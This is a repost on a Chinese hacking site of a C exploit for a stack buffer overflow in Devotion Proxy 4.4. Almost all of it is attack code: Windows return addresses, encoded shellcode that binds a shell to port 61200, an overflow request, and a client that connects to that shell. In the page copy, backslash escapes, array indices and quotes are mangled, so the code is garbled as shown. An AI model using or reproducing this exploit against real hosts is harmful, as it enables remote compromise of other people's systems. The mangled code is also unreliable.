您现在的位置: | Devotion Proxy 4.4 Stack Overflow Exploit |
| Devotion Proxy 4.4 Stack Overflow Exploit | ||
| 作者:YesHack.… 文章来源:YesHack.Com 更新时间:2006-4-18 8:13:49 【字体:小 大】 | ||
/* _ ___ _ _ _ _ __| |_ _ / __| | | _ _ (_)_ _| |__ __ _ ___ / _` | ’_| (_ |_ _| ’ | | || | ’_ / _` (_-< __,_|_| ___| |_||_||_|/ |_,_|_.__/__,_/__/ |__/ Presents.... Devotion Proxy 4.4 Stack Overflow Exploit Vulnerability discovered by drG4njubas[m00] Contacts: drG4njubas[at]bk.ru, http://m00.void.ru, #m00sec(@efnet) Greets to Over_G, D4rkGr3y, r4ShR4y, h0snp, ... Compile with m$Content$nbsp;visual c++: cl m00-devproxy.cpp */ #include <windows.h> #include <winsock.h> #include <stdio.h> #include <conio.h> #pragma comment (lib,"wsock32") struct{ char *platform; DWORD retaddr; //jmp esp } targets[]={ {"Windows 2000 SP1" , 0x77e3cb4c } , {"Windows 2000 SP2" , 0x77e2492b } , {"Windows 2000 SP3" , 0x77e2afc5 } , {"Windows 2000 SP4" , 0x77e14c29 } , {"Windows XP SP0" , 0x77f5801c }, {"Windows XP SP1" , 0x77e626ba }, {"Windows NT SP6" , 0x77f32935 }, NULL }; //Shellcode binds shell to a port 61200 //Download sources from www.m00.ru char shellcode[]= "xEBx0Fx58x80x30x92x40x81x38x6Dx30x30x21x75xF4" "xEBx05xE8xECxFFxFFxFFx7BxC6x93x92x92xCFxC7xA3" "x49xF6x19x91xD2x01x19xD1x6DxD2xE7x6Bx19xC1x91" "xF4xA3x40xF4x2Ax92x82xF4x13xA8xDFxC8xE6x95xBB" "x50x7Bx60x6Dx6Dx6Dx1Bx41x19xE8xAEx93x45x91xCD" "xEAx19xD9x8Ax19xE1xB2x19xE9xB6x93x44x93x45x6E" "x3Fx93x42x04x15x6FxC3xA3x5Bx12x53x9Dx61x34xE0" "x98x04xCBx15x6FxE6x80xD5xD5x70x74x2Cx9Dx92x92" "x92xBBx5CxBBx65x7Bx7Ax6Dx6Dx6DxA3x52xF4x19x95" "x53x72x90x19xE1x8Ex93x44x93x54x3Fx93x42x1Bx54" "x1Bx45xCFxC5x1Fx0Fx9Dx92x92x92xC1xC5x6Dx44x1F" "x0FxC1x92x92x92xC1x6Dx42x1Bx55x1Fx0FxC8x92x92" "x92xC1xC2x6Dx44xA3x5BxC3xC3xC3xC3xFAx93x92x92" "x92xFAx90x92x92x92x6Dx42x1Bx51x1Fx17xF7x92x92" "x92xC2xC5x6Dx44xFAx82x92x92x92x1Fx1FxEAx92x92" "x92xC3xC1x6Dx42x1Fx17xF8x92x92x92xC2xC5x6Dx44" "xFAx93x92x92x92xC1x6Dx42x1Fx17xE3x92x92x92xC2" "xC5x6Dx44xA3x5BxC3xC3xC1x6Dx42xCDxC2x1Fx0FxD5" "x92x92x92xC1xC5x6Dx44xFAx6Dx92x92x92xFAxD2x92" "x92x92x6Dx42x1Bx51x1Fx1FxBAx92x92x92xC3xC5x6D" "x44xC1x6Dx42xCAx1BxD1xD2x1BxD1xAEx1BxD1xAAx55" "xD1xBEx93x93x92x92x1Fx17xAAx92x92x92xC2xC5x6D" "x44xC1xC1xA3x5BxC3xC3xC3xFAx93x92x92x92xC3xC3" "x1Fx0Fx1Ex92x92x92xC1xC3x6Dx42x1Fx17x8Ex92x92" "x92xC2xC5x6Dx44x6Dx42x7Ax35x6Cx6Dx6DxD5xF7xE6" "xC2xE0xFDxF1xD3xF6xF6xE0xF7xE1xE1x92xDExFDxF3" "xF6xDExFBxF0xE0xF3xE0xEBxD3x92xD7xEAxFBxE6xC2" "xE0xFDxF1xF7xE1xE1x92xD5xF7xE6xC1xE6xF3xE0xE6" "xE7xE2xDBxFCxF4xFDxD3x92xD1xE0xF7xF3xE6xF7xC2" "xE0xFDxF1xF7xE1xE1xD3x92xD5xFExFDxF0xF3xFExD3" "xFExFExFDxF1x92xE5xE1xA0xCDxA1xA0x92xC5xC1xD3" "xC1xFDxF1xF9xF7xE6xD3x92xF0xFBxFCxF6x92xFExFB" "xE1xE6xF7xFCx92xF3xF1xF1xF7xE2xE6x92x90x92x7D" "x82x92x92x92x92x92x92x92x92x92x92x92x92x93x92" "x92x92xF1xFFxF6x92x6Dx30x30x21"; char jump[]= "x29x4cxe1x77" //retaddr "x90x90x90x90" "x90x90x90x90x90" "xE9xFCxF3xFFxFF"; char request[]= " /Proxy.dtl?URL=www.m00.ru HTTP/1.1rn" "Accept: */*rn" "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)rn" "Connection: Keep-Alivern" "Cookie: session-id=1rnrn"; void usage(); void have_fun(int sock); DWORD WINAPI recv_thread(LPVOID lpParam); void main(int argc, char **argv){ WSADATA wsaData; SOCKADDR_IN rmaddr; HOSTENT *addr; SOCKET sock,shell; DWORD tmp; char buf[100], exploit[4096+sizeof(jump)]; int i,t; printf("n*******************************************n"); printf(" Devotion Proxy buffer overflow exploit n"); printf(" Coded by drG4jubas[m00 Crew] n"); printf("*******************************************nn"); if(argc<4){ usage(); return; } t = atoi(argv[3]); i = 0; while(targets.platform)i++; if(t >= i){ printf("Bad targetn"); return; } memcpy(jump, &targets[t].retaddr, 4); for(i = 0; i < sizeof(exploit);i++)exploit = ’x90’; for(i =0; i < sizeof(shellcode)-1; i++)exploit[i+1038] = shellcode; memcpy(exploit+4096, jump, sizeof(jump)-1); WSAStartup(MAKEWORD(2,2), &wsaData); sock = socket(AF_INET, SOCK_STREAM, 0); addr = gethostbyname(argv[1]); if(addr != NULL)memcpy(&(rmaddr.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length); else{ printf("Can not resolve host namen"); return; } rmaddr.sin_family = AF_INET; rmaddr.sin_port = htons(atoi(argv[2])); printf("Connecting to %s...", argv[1]); if(connect(sock,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("failedn"); return; } printf("okn"); printf("Sending exploit..."); send(sock, exploit, sizeof(exploit), 0); send(sock, request, sizeof(request), 0); printf("donen"); CreateThread(NULL, 0 ,recv_thread, (LPVOID)sock, 0, &tmp); Sleep(100); shell = socket(AF_INET, SOCK_STREAM, 0); rmaddr.sin_port = htons(61200); if(connect(shell,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("Exploitation failed:(n"); closesocket(sock); WSACleanup(); return; } printf("Congratulations!!! Shell spawned :Dnn"); have_fun(shell); closesocket(shell); closesocket(sock); WSACleanup(); return; } void usage(){ int i; printf("USAGE: "); printf("m00-devproxy.exe <host> <port> <platform>nn"); printf("Target platforms:n"); for(i =0; targets.platform; i++) printf("%d - %sn", i, targets.platform); } DWORD WINAPI recv_thread(LPVOID lpParam){ SOCKET sock; char buf[128]; sock = (SOCKET)lpParam; recv(sock, buf, 128, 0); return 0; } void have_fun(int sock){ char buf[1024]; int i; fd_set fdread; TIMEVAL time; time.tv_sec = 1; time.tv_usec = 0; do{ FD_ZERO(&fdread); FD_SET(sock, &fdread); i = select(0, &fdread, NULL, NULL, &time); if(i > 0){ int j = recv(sock, buf, 1024, 0); if(j == SOCKET_ERROR)break; buf[j] = ’’; printf("%s", buf); } if(kbhit()){ fgets(buf, 1024, stdin); send(sock, buf, strlen(buf), 0); if(buf[0] == ’r’){ buf[0] = ’n’; printf("%c",buf[0]); send(sock, buf, 1, 0); } } }while(i != SOCKET_ERROR); return; |
||
|
||
| 文章录入:YesHack.Com 责任编辑:YesHack.Com | ||
